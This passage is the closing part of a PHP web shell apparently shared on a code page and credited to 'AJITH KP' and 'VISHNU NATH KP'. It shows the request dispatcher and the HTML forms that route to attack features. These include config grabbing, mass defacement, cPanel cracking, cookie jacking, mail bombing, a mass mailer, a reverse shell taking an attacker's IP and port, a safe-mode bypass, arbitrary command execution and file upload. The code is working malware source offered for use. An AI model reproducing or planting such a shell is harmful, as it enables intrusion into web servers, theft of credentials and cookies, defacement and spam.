  2007. else if(isset($_REQUEST['config_grab']))
  2008. {
  2009. sym_xxx();
  2010. }
  2011. else if(isset($_REQUEST['ftp_man']))
  2012. {
  2013. ftp_man_ui();
  2014. }
  2015. else if(isset($_REQUEST['mass_xploit']))
  2016. {
  2017. mass_deface_ui();
  2018. }
  2019. else if(isset($_GET['f_host']) && isset($_GET['f_user']) && isset($_GET['f_pass']))
  2020. {
  2021. ftp_man_bg();
  2022. }
  2023. else if(isset($_GET['mass_name']) && isset($_GET['mass_cont']))
  2024. {
  2025. mass_deface_bg();
  2026. }
  2027. else if(isset($_REQUEST['ftp_anon_scan']))
  2028. {
  2029. ftp_anonymous_ui();
  2030. }
  2031. else if(isset($_GET['ftp_anonz']))
  2032. {
  2033. ftp_anonymous_bg();
  2034. }
  2035. else if(isset($_REQUEST['killme']))
  2036. {
  2037. killme();
  2038. }
  2039. else if(isset($_REQUEST['hexenc']))
  2040. {
  2041. hex_encode_ui();
  2042. }
  2043. else if(isset($_REQUEST['remotefiledown']))
  2044. {
  2045. remote_download_ui();
  2046. }
  2047. else if(isset($_GET['type_r_down']) && isset($_GET['rurlfile']) && isset($_GET['path']))
  2048. {
  2049. remote_download_bg();
  2050. }
  2051. else if(isset($_REQUEST['cpanel_crack']))
  2052. {
  2053. cpanel_crack();
  2054. }
  2055. else if(isset($_REQUEST['rem_web']) && isset($_REQUEST['tryzzz']))
  2056. {
  2057. remote_file_check_bg();
  2058. }
  2059. else if(isset($_REQUEST['typed']) && isset($_REQUEST['typenc']) && isset($_REQUEST['php_content']))
  2060. {
  2061. php_ende_bg();
  2062. }
  2063. else if(isset($_REQUEST['remote_server_scan']))
  2064. {
  2065. remote_file_check_ui();
  2066. }
  2067. else if(isset($_REQUEST['server_exploit_details']))
  2068. {
  2069. exploit_details();
  2070. }
  2071. else if(isset($_REQUEST['from']) && isset($_REQUEST['to_mail']) && isset($_REQUEST['subject_mail']) && isset($_REQUEST['mail_content']))
  2072. {
  2073. massmailer_bg();
  2074. }
  2075. else if(isset($_REQUEST['mysqlman']))
  2076. {
  2077. mysqlman();
  2078. }
  2079. else if(isset($_REQUEST['bomb_to']) && isset($_REQUEST['bomb_subject']) && isset($_REQUEST['bmail_content']))
  2080. {
  2081. mailbomb_bg();
  2082. }
  2083. else if(isset($_REQUEST['cookiejack']))
  2084. {
  2085. cookie_jack();
  2086. }
  2087. else if(isset($_REQUEST['massmailer']))
  2088. {
  2089. massmailer_ui();
  2090. }
  2091. else if(isset($_REQUEST['rename']))
  2092. {
  2093. chdir($_GET['path']);
  2094. rename_ui();
  2095. }
  2096. else if(isset($_GET['old_name']) && isset($_GET['new_name']))
  2097. {
  2098. chdir($_GET['path']);
  2099. rename_bg();
  2100. }
  2101. else if(isset($_REQUEST['encodefile']))
  2102. {
  2103. php_ende_ui();
  2104. }
  2105. else if(isset($_REQUEST['edit']))
  2106. {
  2107. edit_file();
  2108. }
  2109. else if(isset($_REQUEST['read']))
  2110. {
  2111. chdir($_GET['path']);
  2112. code_viewer();
  2113. }
  2114. else if(isset($_REQUEST['perm']))
  2115. {
  2116. chdir($_GET['path']);
  2117. ch_perm_ui();
  2118. }
  2119. else if(isset($_GET['path']) && isset($_GET['p_filex']) && isset($_GET['new_perm']))
  2120. {
  2121. chdir($_GET['path']);
  2122. ch_perm_bg();
  2123. }
  2124. else if(isset($_REQUEST['del_fil']))
  2125. {
  2126. chdir($_GET['path']);
  2127. delete_file();
  2128. exit;
  2129. }
  2130. else if(isset($_REQUEST['phpinfo']))
  2131. {
  2132. chdir($_GET['path']);
  2133. ob_clean();
  2134. echo phpinfo();
  2135. exit;
  2136. }
  2137. else if(isset($_REQUEST['del_dir']))
  2138. {
  2139. chdir($_GET['path']);
  2140. $d_dir=$_GET['del_dir'];
  2141. deldirs($d_dir);
  2142. }
  2143. else if(isset($_GET['path']) && isset($_GET['new_file']))
  2144. {
  2145. chdir($_GET['path']);
  2146. mk_file_ui();
  2147. }
  2148. else if(isset($_GET['path']) && isset($_GET['new_f_name']) && isset($_GET['n_file_content']))
  2149. {
  2150. mk_file_bg();
  2151. }
  2152. else if(isset($_GET['path']) && isset($_GET['new_dir']))
  2153. {
  2154. chdir($_GET['path']);
  2155. create_dir();
  2156. }
  2157. else if(isset($_GET['path']) && isset($_GET['cmdexe']))
  2158. {
  2159. chdir($_GET['path']);
  2160. cmd();
  2161. }
  2162. else if(isset($_POST['upload_f']) && isset($_POST['path']))
  2163. {
  2164. upload_file();
  2165. }
  2166. else if(isset($_REQUEST['rs']))
  2167. {
  2168. reverse_conn_ui();
  2169. }
  2170. else if(isset($_GET['rev_option']) && isset($_GET['my_ip']) && isset($_GET['my_port']))
  2171. {
  2172. reverse_conn_bg();
  2173. }
  2174. else if(isset($_REQUEST['safe_mod']) && isset($_REQUEST['path']))
  2175. {
  2176. chdir($_GET['path']);
  2177. safe_mode_fuck_ui();
  2178. }
  2179. else if(isset($_GET['path']) && isset($_GET['safe_mode']))
  2180. {
  2181. safe_mode_fuck();
  2182. }
  2183. else if(isset($_GET['path']) && isset($_REQUEST['forbd_dir']))
  2184. {
  2185. AccessDenied();
  2186. }
  2187. else if(isset($_REQUEST['symlink']))
  2188. {
  2189. sym_link();
  2190. }
  2191. else if(isset($_GET['path']) && isset($_GET['copy']))
  2192. {
  2193. copy_file_ui();
  2194. }
  2195. else if(isset($_GET['c_file']) && isset($_GET['c_target']) &&isset($_GET['cn_name']))
  2196. {
  2197. copy_file_bg();
  2198. }
  2199. else
  2200. {
  2201. filemanager_bg();
  2202. }
  2203. ////////////////////////////// End Frond End Calls //////////////////////////////
  2204. echo "</div><div id=result><center><p><table class='tbl'>
  2205. <tr><td><form method='GET'>PWD : <input size='50' name='path' value=".getcwd()."><input type='submit' value=' >> ' /></form></td></tr></table>
  2206. <table class='tbl'><tr>
  2207. <td><form style='float:right;' method='GET'><input name='path' value=".getcwd()." type=hidden><span> New File : </span><input type='submit' value=' >> ' ><input size='40' name='new_file' /></form>
  2208. </td>
  2209. <td><form style='float:left;' method='GET'><input name='path' value=".getcwd()." type=hidden><input size='40' name='new_dir'><input type='submit' value=' >> ' /><span> : New Dir</span></form>
  2210. </td>
  2211. </tr>
  2212. <tr>
  2213. <td><form style='float:right;' method='GET'><input style='float:left;' name='path' value=".getcwd()." type=hidden><span>CMD : </span><input type='submit' value=' >> ' ><input name='cmdexe' size='40' /></form>
  2214. </td>
  2215. <td><form style='float:left;' method='POST' enctype=\"multipart/form-data\"><input name='path' value=".getcwd()." type=hidden><input size='27' name='upload_f' type='file'><input type='submit' name='upload_f' value=' >> ' /><span> : Upload File</span></form>
  2216. </td>
  2217. </tr>
  2218. </table></p><p><font size=4 color=green>&copy <a style='color:green; text-decoration:none;' href=http://facebook.com/ajithkp560>AJITH KP</a> & <a style='color:green; text-decoration:none;' href='http://www.facebook.com/vishnunathkp'>VISHNU NATH KP</a> &copy</font><br />&reg TOF [2012] &reg</div>"
  2219. ?>

comments powered by Disqus